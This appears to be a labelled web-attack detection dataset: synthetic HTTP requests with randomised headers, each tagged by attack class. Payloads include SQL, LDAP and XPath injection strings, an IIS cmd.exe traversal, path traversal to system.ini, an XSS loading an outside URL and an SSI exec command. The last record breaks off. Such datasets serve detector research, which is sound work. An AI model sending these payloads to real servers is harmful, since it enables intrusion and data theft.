End - Id: 37701
Start - Id: 41459
class: SqlInjection
POST /mxCEDq@FAo/SMQO%uvv6/nrf_OYt9-/Xs9yeu/yUfrzWl9vm9FW/cfH/mm_dWHMbFFMP/tt8v/b2u9lieitt.jsp? HTTP/1.1
Content-Length: 109
Content-Language: geeueg
Content-Encoding: compress
Content-Location: /m5erdtSh/dkopVf2e/isherp1/tso2.jpg
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jan 07 06:23:03 GMT
Last-Modified: Wed, 24 May 06 13:42:20 GMT
Host: www.hou9e.org:7
Connection: e6aqbnr
Accept: text/*;q=0.2
Accept-Charset: iso-2022-kr, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: snt1Js2-i1s, Tr-beisTt, trt-epfhsJ;q=0.9, d0hrhd-xrgds;q=0.0, ewa3mir-r
Cache-Control: RosU='shao'
Client-ip: 165.216.117.58
Cookie: Udivx9lPEFyR=1377;2gtbaraegactl=74;d2onsd1=iesodf9aeI:~3iood;oathqe=wqTfS;dsorsaeataye2e=4
Cookie2: $Version="83"
Date: Fri, 21 Sep 07 16:30:12 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Fri, 17 Aug 07 18:21:21 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: *
If-Range: *
Max-Forwards: 40
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://a2eAbnL.org/steh3/aiSsade/e4mS/hslaedu.pl
TE: trailers,deflate;q=0.4,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (X11; U; Linux i386 1.6; ko-ta; rv:9.3.9) Gecko/66297290
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: gzip
Upgrade: ilbd/6.7, 6Adhh/9.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wibaet=uwIAsZ5K9pCK&osdb6etraso=l\o&FaOrcgabinVad=OR    'oe'    BETWEEN 'R'  AND 'T'&sr=9957690

End - Id: 41459
Start - Id: 47868
class: XSS
GET /hi/4pAVoFmTK3Hl@r/cZQ3akKNY63I/oreaeeodINth7aam/xednsdcd2ettmU.png?qi=%3Cdiv+++style+%3D++%22+++++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.ar.com%2Fscript%2FpSq.aspx%5D%29%3B++%22+%3E&izoe0oI5guwcet=y%40oinput&wq0f142Iv=mti6ereotah%40 HTTP/1.0
Host: 202.64.248.129
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 21.122.38.8
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="8"
Date: Wed, 04 Feb 04 15:20:09 UTC
ETag: "jyvTDLdVK3kRRBHcIa"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Dec 04 18:40:40 GMT
Max-Forwards: 1
MIME-Version: 9.4
Pragma: ltsOa4ai=3hplmear
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 541-3,060-23987,670-3
Referer: http://tNuutt.net/hn9atahe/n5nKa/scv3/Caye6eee/Tsntw3.pdf
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: dmCm (lrx_4WnH; mJVpPpsDr)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: deflate
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 307 50.130.247.108 "2mlin3oeoesToap" "Mon, 23 Feb 04 03:39:06 GMT"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47868
Start - Id: 43768
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 22.7.234.28
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1251, iso-8859-1;q=0.9, euc-kr, x-mac-hebrew;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: ao='p8'
Client-ip: 111.17.94.212
Cookie: ad4f=yb;cfp=\m;qNBxaC@VH=2
Cookie2: $Version="1"
Date: Tue, 02 Sep 08 16:32:09 CET
ETag: W/"v8oIFfpbb9jaiyr"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Thu, 10 Jun 04 19:07:31 GMT
If-Unmodified-Since: Tue, 25 Oct 05 05:57:49 CET
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "EGU7l-Ye4iMV_T0X-"
If-Range: Fri, 13 Mar 09 02:50:55 UTC
Max-Forwards: 34
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://Ahetr.cz/oeht9eat/lnslpthu.htm
TE: deflate,deflate,chunked;q=0.8
Trailer: From
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 2.9; 1o-lo; rv:8.6.0) Gecko/46111536
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: HTTP/9.9 www.oxuqsnf.css, 1.0 193.202.64.234, HTTP/4.2 215.58.113.179:3
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 725 239.192.69.199 "oo5kiaaie" "Thu, 23 Jun 05 19:03:49 CET"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43768
Start - Id: 48792
class: XPathInjection
GET /e5ttpiN/3sdye9eymt/tjmkePH/QA-QHOzQ@WF/zflechoJjh8Kpasswd/toceEcohtmu/o02N/K0UR.pDLL/lmIoeqt/owQzmlh_OoUaHydgQ--/s3pA7/tyHMLtr.php?iee9smrisw=6nKB8qX1&R5wboot.iniL.=dwdocumente%3B%7Eetdivhieo&eheeh=TtlunsyEcauyeun&g6rLamibo=09551614&trat=ihT&_SfKA2JU=n8a8%3D&kSwindow.openmailscopyY2htpass=whdeBnra1hida0oa%3B%40node&498y.iframeVKI=eNY-JNobN&gaEA9=dropw6aenttmiO+e&szStSts0eaist=4022086&di2oR=thnrno%27+++or+count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++i++++%2B++j+%2B++k%2Bl%2B++++1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27eEr%27+%3D+%27++Eethycw%27+or HTTP/1.1
Host: www.rqtrvglo.de
Connection: keep-alive
Accept: application/rtf, text/*;q=0.7, video/*
Accept-Charset: iso-2022-kr;q=0.2, x-mac-arabic, windows-1257;q=0.4
Accept-Encoding: 
Accept-Language: MtCoaapp-wOaw, Ulh-ol;q=0.4, enus-mcps, oa-eqt3oyoo
Cache-Control: no-cache
Client-ip: 208.70.172.168
Cookie: Hscsuaehs=0769;noratte9rwal=qLs8q
Cookie2: $Version="7"
Date: Mon, 19 May 08 01:08:21 UTC
ETag: W/"gTz@WD@id8M7yzIPzc"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Sun, 05 Aug 07 10:19:33 UTC
If-Unmodified-Since: Thu, 08 Dec 05 12:49:51 UTC
If-Match: *
If-None-Match: "z4.RB3pIiLz5Ap_6Y7d"
If-Range: *
Max-Forwards: 751
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: http://s9sp.it/uqss/ebtr/spnsl6r.htm
TE: trailers,deflate;q=0.5,trailers
Trailer: If-Match
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 1.6; mn-wu; rv:0.8.1) Gecko/51014822
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: ttt9yt/3.4 107.87.64.50, FTP/6.4 www.eonacna.jpeg
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 538 www.cErriaih.tiff:9 "osyScc8wde9ls" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48792
Start - Id: 37151
class: LdapInjection
GET /-42/tabooo2esoeocrohei/r-l6/hInrdoDzoLWM8K_/e58F.oz4E@@_Xd/y.FDvHaz6PaK/n8igoi2sdqmnoopref.tiff?tluetopiSsnepye=%29++++%28+%7C++%28++++cn%3D*o+%27brien*++++%29%28mail+++%3D*o++++%27brien*++%29++&367dthccat=evcC3yF4&rnetq9ncdad4E=uK- HTTP/1.0
Host: 182.167.69.16
Connection: keep-alive
Accept: video/quicktime;q=0.6, application/zip, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: atpu3tca-ALl, r3oHwBa-PtlgYsdW, nttahtf4-j;q=0.2
Cache-Control: max-stale=37859
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Fri, 04 Mar 05 14:05:40 UTC
ETag: "fJDFWgf-jr4hocD.lbId"
Expect: mawdi
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 09 Nov 05 04:40:05 CET
If-Unmodified-Since: Thu, 19 Feb 09 12:58:52 UTC
If-Match: *
If-None-Match: "Ug.9DWRyEQLn@jFnZka"
If-Range: "ftl8FWJy-G5yuIQYrI8y"
Max-Forwards: 7
MIME-Version: 8.7
Pragma: oiiak='oeuithoe'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: NTLM dG9ucml0anJpd29uU2I2dG5XT2FmZTFzZHRsYWxjb3JkZg==
Range: 88347-,9-
Referer: /iieOMat/uiDaomn/tiusys.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 9.5; pi-in; rv:7.5.0) Gecko/38895949
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/6.7 231.57.240.134, 6.8 143.95.90.197
Transfer-Encoding: identity
Upgrade: hzs/8.1, Sct/5.2, 1jwo4/3.2, u0ie/8.6, lheiu/9.7
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 246823247124
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37151
Start - Id: 36941
class: LdapInjection
PUT /fDU-bD2nJsDi6HGG/5bZ5fT9vXTCmailjN-/child7L/YBhomet/2bNEkPR2b1LAp/osrmxe977d/po4or.jpeg? HTTP/1.0
Content-Length: 335
Content-Language: nbal,Hwyaahi
Content-Encoding: compress
Content-Location: http://dhe9aw.cz/E8sat/lumoIcl/iiap/olire.zip
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Jul 06 06:29:07 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 148.109.177.231:2
Connection: close
Accept: video/*;q=0.0, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: rsr-eiiade;q=0.3, drit-ap;q=0.3
Cache-Control: only-if-cached
Client-ip: 28.240.217.24
Cookie: cgnoh3isanu=2t+pti4 5n1eyv;N0U8dYoKEe=2039;Omy=jEbody-tc;vZdmthvprocessing-instruction=26;WkWFtF_bGT=586473;gjsdouu=relinktsnnph-]aaobjecte
Cookie2: $Version="3"
Date: Sat, 17 Dec 05 08:44:12 CET
ETag: "QOCuHnFfkzG-_szi_7"
Expect: 100-continue
From: ohnue@asue.fr
If-Modified-Since: Tue, 17 Apr 07 21:06:11 UTC
If-Unmodified-Since: Mon, 03 Oct 05 11:18:39 GMT
If-Match: "Dk07Hk.Msl2S8Wbl"
If-None-Match: "ONA2@F2ihExyREdCQx"
If-Range: "fKoo2KBtWM6jZm8E1lH"
Max-Forwards: 9828
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic c3BucnRhOm9yczFldTc=
Range: 060649-
Referer: http://www.175rste.st/rexayri/3siotel/lpr0h/6oecg.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: nr6n2a (uO3Q-gnSal; 93K0hlOit)
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: identity
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neepa=nm2Ot2mhpcnu&ntaOtljcuetda=46711846&dyhRlrr2tl=emetI&stmo6a9=52650&hadnC=dDeUee&po9ltteo=eh&UJQ7XlQ9g@g=mhuittere  scriptkwps\ &escrasdbtnthe=e4tiTistR&ordKxk5rwS= tkqgroup byiawhere>trstdin0acsystemvwnnmeta&DKSfHAaopen=ohgabnlamailreplace&eteat0enmel=54789237&eeutAa9rA=) (  |   (odved=bfiio*)&nelob2itwrfitq=356

End - Id: 36941
Start - Id: 36896
class: LdapInjection
GET /UJbSUtyebrrvenbeho7t/sxokhwUpUTZ.J-@/cHhpw/hpYga3E8J7/hbPFqM7dzLjJrTnlUNWq/1qmu/G2Rg/gGswRGO7ftpt/hAaWxUKErU_wjQkinM/rOncgisndxea7elLtid.htm?sdyziacend=t6HMo&ryolatcMJr=%3Bs3neiwv7t%28yhs-st%25u&.kTH=94ttodnwearisosh&idx9=gevr&gstiqa=d%26at&ntdAwslnoneOdt=%3Em&ageElo2qhotee=iesinsie3m0Se%29owp-&etxt8Ometvjytst=nvCY87sCzC&wNasAx=g0O&hDsrnSemdd=ekaitelnet HTTP/1.1
Host: www.tmsiae.de
Connection: drys
Accept: audio/x-wav, application/*;q=0.9, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 27.238.152.217
Cookie: mtftesi7nucc=ctktvr~t;LPAVhttpsY0aN6=mP.r;enesdae=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="03"
Date: Mon, 16 Nov 09 10:37:05 UTC
Expect: 100-continue
From: eehceTs@jTtcri.biz
If-Modified-Since: Sun, 04 Oct 09 09:59:33 CET
Max-Forwards: 24
Pragma: no-cache
Authorization: NTLM bG5lYjBvVmF0aHUwYWtFQ2VpNHRpZ2RuRE1kdHJpdmVhZTBJdWdyVjR5ZXl0
Referer: http://www.id2u5.de/NeEBjg/nergos/e0Eat.pdf
User-Agent: Mozilla/6.1 (Windows; U; WinNT 0.6; St-ds; rv:0.7.0) Gecko/53641822
UA-Color: color8
UA-Pixels: 572x729
Via: FTP/3.5 www.dhav.jpeg
Upgrade: n5t/7.6, ptt/7.9

null

End - Id: 36896
Start - Id: 38635
class: LdapInjection
GET /eekoiB/redixoem5mlSuoaajlo.jpg?agTtoKd5qtcAh=uslrcidsdestyle&nsdNN3no0hnY=43572392&at=da4tK0eitokede&00=eeeeli&otd=Esxlit&attL=li2shH4w&mlnvsupMis=eEEx%29%28%7C++%28iped5%3D*%29&z.Xv_form0C=hf&echoGpzlQJ8=%2Badminlsn HTTP/1.1
Host: 197.103.222.227
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-tw;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 208.123.158.22
Cookie: eo0o=servicesisouspnvld>c 0a;ftTrcdph2rben=nlneipasswd&FaLBr i;ab3hewO36=mOynld0;mstjsbestm=mijtNpneegubnl1
Cookie2: $Version="732"
Date: Wed, 24 Dec 08 04:37:27 CET
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: tn0thejR@aoGrudsiow.st
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Tue, 30 Dec 08 07:41:44 UTC
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.5
Pragma: rverote='psa'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: /n3oss/tspgSam/esfs.tiff
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/7.2 (compatible; Konqueror/5.1; Linux i386; yne6)
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38635
Start - Id: 36141
class: PathTransversal
GET /fromSchildpZ5NoYFN/ao4bueeinsiq8slem/iRehrjhsmmhun/htie7/hneiraol5p5thi6nbnA/l4ZX/InstteeqDu1KbssegDWe/28/mh/n19KVmIcgdWy.cgi?ean=deiror%40e%5C%24qidlS&eea4mstcis=%40%3Fnbg%26zmhrpx1connectv&eombjt7h=heuh4Dez&jyfRvaceeE=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.rr1oner.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: koi8;q=0.2
Accept-Encoding: compress
Accept-Language: 0-9, i-6eti, iu-lfS, u7dn5r-6saeNst;q=0.2, weEcncs-lbnsecd;q=0.4
Cache-Control: no-store
Client-ip: 25.79.74.161
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="1"
Date: Fri, 30 Oct 09 20:52:54 GMT
ETag: "1Th7ACFJdKWcpA5LuNZ"
Expect: 100-continue
From: Arat@rNst.com
If-Modified-Since: Tue, 22 Jan 08 12:50:20 UTC
If-Unmodified-Since: Fri, 13 Oct 06 24:40:41 UTC
If-Match: *
If-None-Match: "1@GKwCcl3LZPQvuE@l_"
If-Range: Sun, 21 May 06 10:21:42 CET
Max-Forwards: 8431
MIME-Version: 1.7
Pragma: tmetu=Etciw
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest qop=hiiaf
Range: -52194,2-,7-21979
Referer: http://www.bleb.fr/p1ea.html
TE: chunked;q=0.0,chunked
Trailer: Accept-Encoding
User-Agent: tCgni6i (rWfSoGHk; egT7y85; enOcjfE1; ot63moHg6v)
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 2.0 www.nhN8a5.tiff:42, 2.5 255.157.246.7
Transfer-Encoding: tkd2i
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36141
Start - Id: 41844
class: SqlInjection
GET /sQS5MOBm4Vj2/dn8GIwg0n/7OeO/alEj3en/rhe7Ar8iIitoCqtIet/Mr/yeteyehse9jaNm.js?rwn8eihq=622739&Gnnh1ndeliJ=%27+++OR+%27kait%27++LIKE+%27aze%2525&seh4jhiasnl9han=algftorqcZt8nh&eEeta=534611&ewtb0=e0IcW3i7%405T&Psauitrihm=exp_%26ehi%7Cqomabu&eylobsSi=64&eottiesesauro=rnV7&3xuPcx6T=neReo&ffgfeetgo7ytl=t0dequoTn8&2l0=aUsrE&6r2tiisepdeqst=647858174&udaeheONexif=uslz HTTP/1.0
Host: www.daereb.org
Connection: dro4too
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: s-9mShmdad;q=0.3, hra-ooeaowk, rseitur-tI;q=0.9, u0out-q1rlrde, Mndln-xciBsqr;q=0.4
Cache-Control: no-transform
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Mon, 19 Apr 10 10:27:55 CET
ETag: "Pcy6CIpDuU4di8br"
Expect: eeofsc=natlqi
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Thu, 03 May 07 24:46:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic dG90ZGgzMTpUb2hj
Authorization: heea seltmfr=o7On
Range: 73381-69805,4-176585
Referer: http://ecjhsta.st/0aodcaee/reqetE/tmPb0ekr.tar
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 0.6; aE-nf; rv:7.6.8) Gecko/33440822
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 541 75.79.93.246 "gtmeetecTcrcgl" "Sun, 13 Nov 05 09:19:41 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41844
Start - Id: 35345
class: SqlInjection
GET /jdnNgQt/lhjug/navG1fzs/tst.php3?apEb4eai=or+++0%3C%3E%28select++count%28*%29+++from+++p5o%29 HTTP/1.0
Host: 246.208.15.1:82
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, big5;q=0.2, us-ascii;q=0.2, x-mac-turkish
Accept-Encoding: compress, compress
Accept-Language: *;q=0.1
Cache-Control: min-fresh=24
Client-ip: 166.203.12.145
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="2"
Date: Sat, 24 Apr 10 06:32:59 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Tue, 06 Jan 09 15:43:18 GMT
If-Unmodified-Since: Sat, 28 May 05 18:50:44 UTC
If-Match: "lE3k8cXeKHc7Msp."
If-None-Match: "CsjpdOm.FkF-1bY"
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 4
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: emdr 68oa=f1Osdlet
Range: 1609-18413
Referer: /susnzemT/aary/mh7g.jpeg
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Soupt/5.2.1.0.9
UA-CPU: 68000
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/3.8 www.sDUaIz.shtml, 3.3 www.unns.jpg, 2.0 120.121.77.67
Transfer-Encoding: mders; TbNmenna=aset
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35345
Start - Id: 40798
class: SSI
GET /0e9am8y/n1gRIBFGhuwUyB@ihw/adminrgroup byuBcB5a6FnetcatZO/2H8E.mspx?5h6rio=%3C%21--+++%23odbc++++connect%3D%226ihuht%2Cdi%2Cueb%22++++++statement%3D%22select+++++*++++from+++i9n%22--%3E&z0hdi=%5D%25&Le=iss&ijterysa=4348&7tEemSaklLad=cxeeueltf1szn HTTP/1.0
Host: 166.149.26.222
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, x-mac-ce;q=0.0, windows-874, windows-1254;q=0.4, x-mac-chinesetrad;q=0.6
Accept-Encoding: *
Accept-Language: 7a4ece2q-sg8eeik
Cache-Control: max-stale
Client-ip: 154.27.72.55
Cookie: 1l1Stieqc=Cdrlt;2ary=l
Cookie2: $Version="344"
Date: Thu, 22 Jan 04 06:39:41 UTC
ETag: "Mkc9ZM08CabKyv1n"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Sun, 17 Apr 05 13:09:46 GMT
If-Unmodified-Since: Thu, 26 May 05 19:18:42 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: *
Max-Forwards: 2560
MIME-Version: 8.4
Pragma: itipoo='taehhoi9'
Proxy-Authorization: Digest username="easT"
Authorization: Basic dGNjTmlzYTpzcmUzbA==
Range: -473515,10127-9,-129281
Referer: http://meae.uk/Ihwurr/e8hr/Gesah.bin
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: ic7ml5rIEv (qY7aSkAWp)
UA-CPU: 68000
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 8812x175
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: tNdwlL/6.5
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 17196143235816087076
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40798
Start - Id: 40302
class: SSI
GET /eb_r2R_s/alXnfD3mBRe/HNCHqeH/sadilnemY/iiebqiiRweA9ted/s5dge8Ik3C080ttn69t/dd1n.asmx?JNconnectnfromt=%3C%21--+++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CTrct3d%5Ciieneea%5Cso.exe++d%3A%5Cullibl%5Cwww.arngon.org%5C3g%5Cdatabase.mdb++++%2Fx+++exporttofoxpro%22--%3E HTTP/1.1
Host: www.niuee.ch
Connection: rEyIe
Accept: */*;q=0.3
Accept-Charset: windows-1251, euc-jp;q=0.5, shift_jis, euc-jp, iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: fo-ahit
Cache-Control: Bthtyne=d9mau
Client-ip: 225.234.167.170
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Sun, 13 Feb 05 15:05:25 CET
ETag: "aZA6H-lbM.cdD6r"
Expect: dwEIlasn
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Sat, 24 Nov 07 22:16:27 CET
If-Unmodified-Since: Tue, 22 Jul 08 04:21:13 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5267
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM YVNuMW9sbm5tZGVpbHRlcnYyaGl3b2VzaW9lY2luc3VoZ2VBbmlvZXR4dQ==
Range: 5046-3165,-1034
Referer: http://nqeuyloi.be/nscecr/ArDqd/uNleihl/mnfae7u/omd7T.js
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 6.8; io-oh; rv:8.6.0) Gecko/72328948
